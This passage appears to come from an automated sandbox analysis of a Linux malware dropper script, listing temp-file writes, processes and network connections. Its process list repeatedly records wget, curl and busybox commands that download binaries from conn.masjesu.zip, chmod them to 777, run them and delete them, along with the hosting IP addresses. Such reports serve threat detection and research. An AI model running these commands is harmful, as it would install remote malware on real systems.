| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
